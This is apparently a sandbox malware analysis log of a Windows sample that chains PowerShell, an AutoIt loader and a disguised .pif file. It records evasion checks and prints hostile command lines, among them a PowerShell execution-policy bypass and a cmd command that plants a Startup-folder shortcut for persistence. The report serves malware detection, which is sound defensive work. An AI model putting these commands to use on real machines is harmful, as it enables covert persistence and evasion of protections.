Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4556Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5298Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4869Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4931Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\PPbimZI4LV.exeAPI coverage: 3.7 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 4869 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 4931 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -23058430092136925s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2524Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00007FF64399C7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA4F8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A6428 FindFirstFileW,FindNextFileW,FindClose,1_2_00007FF6439A6428
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA350
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00007FF6439AA874
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643962F50 FindFirstFileExW,1_2_00007FF643962F50
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00007FF6439A72A8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A71F4 FindFirstFileW,FindClose,1_2_00007FF6439A71F4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399B7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399BC70
Source: C:\Users\Public\Guard.exeCode function: 11_2_00154005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00154005
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0015494A
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015C2FF
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD14 FindFirstFileW,FindClose,11_2_0015CD14
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0015CD9F
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F5D8
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F735
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015FA36
Source: C:\Users\Public\Guard.exeCode function: 11_2_00153CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00153CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_00C4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_00C4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD14 FindFirstFileW,FindClose,17_2_00C4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C43CE2
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643941D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,1_2_00007FF643941D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000013.00000002.3434422171.000001B7CC854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3432950438.000001B7C722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.2359340437.0000022C76D02000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.0000000004198000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000011.00000002.3435466038.0000000003D1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B0A00 BlockInput,1_2_00007FF6439B0A00
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00007FF6439237B0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643945BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,1_2_00007FF643945BC0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643926D1C LoadLibraryA,GetProcAddress,1_2_00007FF643926D1C
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643964318 GetProcessHeap,1_2_00007FF643964318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643968FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF643968FE4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64395AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF64395AF58
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6439457E4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439459C8 SetUnhandledExceptionFilter,1_2_00007FF6439459C8
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011A354 SetUnhandledExceptionFilter,11_2_0011A354
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0011A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00C0A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0A354 SetUnhandledExceptionFilter,17_2_00C0A354

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00007FF64398CE68
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00007FF6439237B0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643944514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00007FF643944514
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B2464 mouse_event,1_2_00007FF6439B2464
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exitJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00007FF64398C858
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00007FF64398D540
Source: PPbimZI4LV.exe, SwiftWrite.pif.11.dr, Guard.exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PPbimZI4LV.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64395FD20 cpuid 1_2_00007FF64395FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
